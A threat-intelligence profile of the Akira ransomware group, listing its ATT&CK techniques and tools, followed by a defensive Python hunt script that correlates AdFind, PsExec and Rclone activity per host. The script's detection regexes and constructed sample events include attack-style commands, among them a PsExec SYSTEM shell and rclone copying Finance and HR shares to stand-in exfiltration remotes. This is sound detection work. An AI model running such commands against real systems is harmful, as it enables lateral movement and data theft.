Akira
Also known as: GOLD SAHARA · PUNK SPIDER · Howling Scorpius
Overview
Akira is both a ransomware family and the intrusion set that deploys it, active since at least March 2023. For initial access, Akira operators use compromised credentials against externally exposed services that lack multi-factor authentication, most often VPN appliances, then rely on publicly available tools and living-off-the-land techniques for discovery and lateral movement. Akira operations follow the "double extortion" model: data is exfiltrated from the victim environment before encryption, and the operators threaten to publish it if the ransom is not paid. Technical analysis of the ransomware shows variants that target Windows hosts or VMware ESXi hypervisors, and multiple overlaps with Conti ransomware.
Capabilities
- Custom malware/implant development — ATT&CK: 3 attributed custom malware families
TTPs — 17 techniques across 11 tactics
Execution
- T1059.001 PowerShell
Persistence
- T1133 External Remote Services
Stealth
- T1027.001 Binary Padding
- T1036.005 Match Legitimate Resource Name or Location
- T1078 Valid Accounts
Defense Impairment
- T1562.001 Disable or Modify Tools
Credential Access
Discovery
- T1018 Remote System Discovery
- T1482 Domain Trust Discovery
Lateral Movement
- T1021.001 Remote Desktop Protocol
Collection
- T1213.002 Sharepoint
- T1560.001 Archive via Utility
Command and Control
- T1219 Remote Access Tools
Exfiltration
- T1567.002 Exfiltration to Cloud Storage
Impact
- T1486 Data Encrypted for Impact
- T1531 Account Access Removal
- T1657 Financial Theft
Tools & malware (8)
Mimikatz · PsExec · AdFind · Akira_v2 · Akira · Megazord · LaZagne · Rclone
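The tool chain above (AdFind for domain discovery, PsExec for lateral movement, Rclone for exfiltration to cloud storage) is what a hunt would look for in process-creation telemetry. The following Python is an added example for this profile, not code from threatfilter.dev or from any Akira sample: it correlates those three stages per host inside a time window. The log format, host and user names, and the regexes are this example's own assumptions; the sample events are constructed. The Rclone rule keys on the `<verb> <source> <remote>:<path>` command-line syntax rather than the binary name, so a renamed copy (T1036.005) is still caught, and it ignores one-letter drive targets so ordinary `copy C:\a D:\b` does not fire.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Stage detectors keyed to the tools and techniques listed in this profile.
# The regexes are this example's assumptions, not published Akira indicators.
STAGES = {
    "domain_discovery (AdFind, T1482/T1018)": re.compile(r"\badfind(\.exe)?\b", re.I),
    "lateral_movement (PsExec, T1021)": re.compile(r"\bpsexe(c|svc)(\.exe)?\b", re.I),
    # rclone-style "<verb> <src> <remote>:<path>"; fires even if the binary is
    # renamed (T1036.005). The remote needs 2+ characters, so "D:" is not a remote.
    "exfil_to_cloud (Rclone, T1567.002)": re.compile(
        r"\b(copy|sync|move)\s+\S+\s+[A-Za-z][\w-]+:", re.I),
}

# Assumed (constructed) flat event format: ts host user image cmdline
EVENT_RE = re.compile(r'^(\S+) host=(\S+) user=(\S+) image=(\S+) cmdline="(.*)"$')

# Constructed sample telemetry; none of these are real events.
SAMPLE_EVENTS = [
    # FS01: recon, lateral movement and exfil inside one night -> should alert
    r'2024-05-01T02:11:04Z host=FS01 user=CORP\svc-backup image=C:\Users\Public\AdFind.exe cmdline="AdFind.exe -f (objectcategory=computer) name operatingsystem"',
    r'2024-05-01T02:40:19Z host=FS01 user=CORP\svc-backup image=C:\Users\Public\PsExec.exe cmdline="PsExec.exe \\DC01 -s cmd.exe"',
    # rclone renamed to look like a system binary; the syntax still gives it away
    r'2024-05-01T03:05:51Z host=FS01 user=CORP\svc-backup image=C:\ProgramData\svchost.exe cmdline="svchost.exe copy \\FS01\Finance mega-exfil:dump --transfers 16"',
    # WS07: ordinary admin activity -> no stage should match
    r'2024-05-01T09:00:00Z host=WS07 user=CORP\jdoe image=C:\Windows\System32\xcopy.exe cmdline="xcopy C:\Data D:\Backup /E"',
    r'2024-05-01T09:01:00Z host=WS07 user=CORP\jdoe image=C:\Windows\System32\cmd.exe cmdline="cmd.exe /c copy C:\a.txt D:\b.txt"',
    # DC01: two stages, but four days apart -> outside the default window
    r'2024-05-01T04:00:00Z host=DC01 user=CORP\svc-backup image=C:\Windows\PSEXESVC.exe cmdline="PSEXESVC.exe"',
    r'2024-05-05T04:00:00Z host=DC01 user=CORP\svc-backup image=C:\Temp\rclone.exe cmdline="rclone.exe sync C:\Shares\HR b2-stash:bucket"',
]


def parse_event(line):
    """Parse one flat event line into a dict; raises on lines that do not fit."""
    m = EVENT_RE.match(line)
    if not m:
        raise ValueError(f"unparseable event: {line!r}")
    ts, host, user, image, cmdline = m.groups()
    return {
        "ts": datetime.strptime(ts, "%Y-%m-%dT%H:%M:%SZ"),
        "host": host, "user": user, "image": image, "cmdline": cmdline,
    }


def classify(event):
    """Return the set of stage labels the event matches (image path or command line)."""
    haystack = f"{event['image']} {event['cmdline']}"
    return {name for name, rx in STAGES.items() if rx.search(haystack)}


def hunt(lines, window=timedelta(hours=24), min_stages=2):
    """Per host, find the window holding the most distinct stages.

    Returns {host: sorted stage labels} for hosts where that window reaches
    min_stages; a lone AdFind run or a lone PsExec session is not enough.
    """
    by_host = defaultdict(list)
    for line in lines:
        ev = parse_event(line)
        stages = classify(ev)
        if stages:
            by_host[ev["host"]].append((ev["ts"], stages))

    alerts = {}
    for host, hits in by_host.items():
        hits.sort(key=lambda h: h[0])
        best = set()
        for i, (start, _) in enumerate(hits):       # each hit opens a window
            seen = set()
            for ts, stages in hits[i:]:
                if ts - start > window:
                    break
                seen |= stages
            if len(seen) > len(best):
                best = seen
        if len(best) >= min_stages:
            alerts[host] = sorted(best)
    return alerts


if __name__ == "__main__":
    for host, stages in hunt(SAMPLE_EVENTS).items():
        print(f"{host}: {', '.join(stages)}")
```

Run against the constructed sample, only FS01 alerts (all three stages within an hour); DC01 has two stages but four days apart, and widening the window to a week surfaces it, which is the knob to tune against the dwell time seen in a given environment. In production the parser would be swapped for the EDR or Sysmon schema in use, and the stage list extended with the other tools named above, for example Mimikatz or LaZagne for credential access and PowerShell for execution.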
Reporting (3)
- Threat Assessment: Howling Scorpius (Akira Ransomware) — Zemah, Y. (Palo Alto Networks Unit 42)
- Akira ransomware continues to evolve — Nutland, J. and Szeliga, M. (Cisco Talos)
- #StopRansomware: Akira Ransomware — CISA et al.